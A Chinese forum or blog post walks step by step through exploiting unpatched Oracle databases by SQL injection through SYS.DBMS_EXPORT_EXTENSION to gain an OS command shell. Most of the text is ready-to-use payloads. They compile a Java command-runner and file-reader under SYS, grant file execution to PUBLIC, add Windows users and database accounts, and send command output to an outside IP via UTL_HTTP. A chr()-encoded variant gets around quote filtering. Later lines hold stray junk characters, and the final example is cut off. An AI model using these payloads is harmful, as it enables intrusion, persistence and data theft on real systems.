实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用 'a'|| 是为了让整个条件返回 true:|| 的优先级高于 <>,不论子查询返回什么(包括 NULL),'a'||子查询 都不等于 '1',而子查询照样会被执行。)
语句有点长,可能要用 post 提交。
注意:SYS.DBMS_EXPORT_EXTENSION 是 SYS 所有并以 SYS 权限执行的包,所以注入进去的 EXECUTE IMMEDIATE 也是以 SYS 身份运行的,后面创建的对象都落在 SYS 方案下(这也是后面调用时写作 sys.LinxRunCMD 的原因)。这个问题在后来的 Oracle 安全补丁中已经修复,下面的步骤只对未打补丁的实例有效。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
(注意:下面把 java.io.FilePermission <<ALL FILES>> 的 execute 权限授给了 PUBLIC,也就是库里所有账号从此都能通过 Java 执行任意程序。这个授权是持久的,文末的清理步骤并没有撤销它,需要另行用 dbms_java.revoke_permission 回收。)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
(测试时不要再加 '11'|| 这样的前缀:函数不存在时子查询返回 NULL,'11'||NULL 仍是 '11',条件恒为真,测不出差别。不加前缀时,子查询为 NULL 会使整个条件为假,页面表现才会不同。)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union(列数和列类型要和原查询对得上):
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带出到自己的服务器:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交http request。换行符要写成 chr(10):Oracle 的字符串字面量不处理反斜杠转义,'\n' 只是反斜杠和字母 n 两个字符,匹配不到 Java 代码里用 "\n" 拼进去的真正换行符。用utl_encode.base64_encode也可以(它的参数和返回值都是 RAW,要配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2 使用)。
--------------------
7.内部变化
通过以下查询可以查看 all_objects 视图中的改变(取证时也可以据此发现遗留的对象):
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8.删除我们创建的函数
注意:下面只 drop 了 LinxRunCMD。LinxReadFile、Java 源 "LinxUtil"、第 2 步授给 PUBLIC 的 FilePermission,以及后文测试用的 linxsql 账号都不会被这一步清掉,需要分别处理。
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即(同一条语句全部用 chr() 编码的形式,适用于引号被过滤的场合):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
. z# l  n& S) P  h9 t确定漏洞存在: 2 ~" I/ J8 Z2 \7 w% t
1<>(
; X# u1 m: v: cselect user_id from all_users where username='LINXSQL'
, z- ?) l+ U# q. y7 Z9 d6 b- J)
% F1 g* H5 s4 C: J6 s给linxsql连接权限:
3 R* H5 X0 W$ a1 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, w1 q1 y1 s7 [& x; R/ ZGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
' z5 _) Z& Q7 R2 V9 R/ X" ?' S5 N删除帐号:
, ~* S4 m$ q6 X; D# Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 O, u6 L8 Q3 Z/ {( [6 a
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1"。但它声明了 authid current_user,所以是以调用者(也就是注入点所用的那个数据库账号)的权限运行,而不是 SYS,可能仅仅是public权限,作用似乎不大;真的要用的话可以考虑先 grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
(原帖此处还接着一个调用示例,但内容已截断,只剩下:and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE ……,无法复原。)